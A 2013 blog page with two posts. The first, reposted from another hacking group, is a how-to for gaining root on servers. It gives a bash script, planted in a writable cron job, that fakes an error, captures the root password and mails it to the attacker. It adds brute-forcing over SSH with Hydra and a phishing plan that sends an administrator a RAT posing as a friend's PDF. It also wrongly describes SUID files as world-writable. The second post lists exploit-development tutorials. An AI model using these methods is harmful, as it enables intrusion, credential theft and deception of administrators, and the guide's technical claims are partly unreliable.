sábado, 6 de julio de 2013

Rooting a Server without any Public Local Root Kernel Exploits!

Hello to Everyone!

As I told to another Comment of a Post I made, and because a Visitor of this Blog requested it, I will share with you some Methods on How to Root a Server when there isn’t any Local Root Kernel Exploit available!

1 – Looking for Custom Cron Tab Scripts
Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.

First, check out if there are any Cron Job Tasks:

crontab -l

If you see any Custom Script, we must Check out if we can Write on it.

Let’s say we got a Custom script here: /bin/cronscript

To check if we can Write a File, type:

stat /bin/cronscript

(If you get something like: “-rwxrwxrwx” in the output, you can edit the File!)

Let’s edit the file and send a Fake Error Message.

Make a Copy of the Original Script to /bin/cronscript.bak:

cp /bin/cronscript /bin/cronscript.bak

Edit the /bin/cronscript like this:


echo “An System Error Occured!”

echo “”

echo “Error Code: #131425″

echo “”

echo “Update to get the Latest Patch for this Security Issue.”

read -s -p “[sudo] password for root ” rootpasswd

echo “”

echo “su: Authentication failure”

echo “”

sudo apt-get update && sudo apt-get upgrade

sudo echo “The Password is: $rootpasswd” > .kod

mail -s “Root’s Password” “email@address.com” < .kod

rm .kod

mv cronscript.bak cronscript

You should just Replace the Underlined with your E-Mail and the Name of the Script!

After you save the File, type: chmod +x cronscript   to set it as Executable!

This script will:

- Send a Fake Error Message

- Request for the Root’s Password

- Send to your E-Mail Address the Password (make sure that there is the “mail” command at the /bin)

- Restore the Original File

When the Script gets Executed, the Root User will Enter his Password and it will be send to you!

It would be better if you had some knowledge on Bash Programming…

2 – Enumerating all SUID Files
An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.
What does this mean for you:  You can Escalate Priviliges in this way, if it is in an Important Directory.
As before, you can Social-Engineer a Privileged User.

To find all SUID Files, type:

find / -user root -perm -4000 -print

This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges!

3 – Private Local Root Exploits
You can find Private Local (or Remote but it is far less common) Root Exploits by searching Google!

I have found Three (!) Private Local Root Exploits on some Kernel Versions I needed.

So, Search search search!  

4 – Bruteforcing Passwords
You can also try to Bruteforce the Password of the Root user or other Priviliged Users!

Use the script named “rootdabitch“!

It runs on the Background and sends you the Password if it is Found!

Here is the Website of the Script….

You can also try to Bruteforce it via SSH! If you scan it with NMap and Find an SSH Port Open (Usually 22), you can Use Hydra to Crack the Password and gain Root Access via SSH!

Here is a Video on how to Bruteforce Passwords with Hydra over SSH:

5 – Social-Engineering the Administrator
This method doesn’t Depend on any Hacking Skills but to your Social-Engineering skills and Research Methods!

You can find so many great Books on Social-Engineering on Google. Search!

Follow these Steps:
1. Search on Google, Facebook,Twitter for Friends of the Administrator

2. Find Personal Information about the Admin (Names, Family, Work Location etc…)

3. Find E-Mails, Telephone/Mobile Numbers

4. Create a JavaDriveBy or a RAT

5. Send a Fake-Mail using a Fake-Mailer as a Friend of the Server’s Administrator including an Infected File (with your RAT)

6. The Admin should open the File and you get Root Priviliges!
Example Message:

Hello Bob!

How are you? I just found out something awesome you will surely like!

It is a surprize! It is attached on a PDF File!

Check it out!
See ya!

Bob is the Victim (the Server’s Administrator). Thus, you have to Pretend to be his Friend. You need to research and Find a Close Friend and His E-Mail address so that it doesn’t seem as an Attack!

Summing that Up,  These are the Steps you should follow:

- Search for a Public Local Root Kernel Exploit. Here is my own Database: p0sth4x0r.net46.net/

- If you don’t find the Appropriate Exploit, try searching Google for Private Local/Remote Root Kernel Exploits.

- If you don’t find something again, try finding all SUID Files and Writeable Cron Tab Scripts that you can Exploit.

- If you aren’t satisfied with the Result, try to Brute-Force User or Root Passwords with Hydra or rootdabitch.

As you can see, you need to have Imagination, good Research Techniques, Programming Knowledge is Preffered, Unix Knowledge and Social-Engineering! Learn even the most basics of all these, and you will know how to Root Servers in Minutes!

Source: gnahackteam

miércoles, 3 de julio de 2013

Exploit development

In this post I just post some useful links for people who just start studding/working with exploits development.

mona.py – the manual <- Higthly recommended tool

First: Exploit Writing Tutorials by corelanc0d3r.
  1. Exploit writing tutorial part 1 : Stack Based Overflows
  2. Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode
  3. Exploit writing tutorial part 3 : SEH Based Exploits
  4. Exploit writing tutorial part 3b : SEH Based Exploits – just another example
  5. Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics
  6. Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development
  7. Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR
  8. Exploit writing tutorial part 7 : Unicode – from 0×00410041 to calc
  9. Exploit writing tutorial part 8 : Win32 Egg Hunting
  10. Exploit writing tutorial part 9 : Introduction to Win32 shellcoding
  11. Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube
  12. Starting to write Immunity Debugger PyCommands : my cheatsheet

Second: SecurityTube Exploit Research megaprimer.

  1. Exploit Research Megaprimer Part 1 Topic Introduction By Vivek
  2. Exploit Research Megaprimer Part 2 Memcpy Buffer Overflow
  3. Exploit Research Megaprimer Part 3 Strcpy Buffer Overflow
  4. Exploit Research Megaprimer Part 4 Minishare Buffer Overflow
  5. Exploit Research Megaprimer Part 5 Freesshd Buffer Overflow
  6. Exploit Research Megaprimer Part 6 Seh Basics
  7. Exploit Research Megaprimer Part 7 Overwrite Seh
  8. Exploit Research Megaprimer Part 8 Exploiting Seh
  9. Exploit Research Megaprimer Part 9 Guest Lecture By Andrew King
  10. Binary Diffing Microsoft Patches

Third: Heap Overflow: For Humans + Vulnerability and Heap Internals Explained

Fourth: ARM exploitation

Fifth: Many interesting videos related with exploit development

Soon this post will be updated.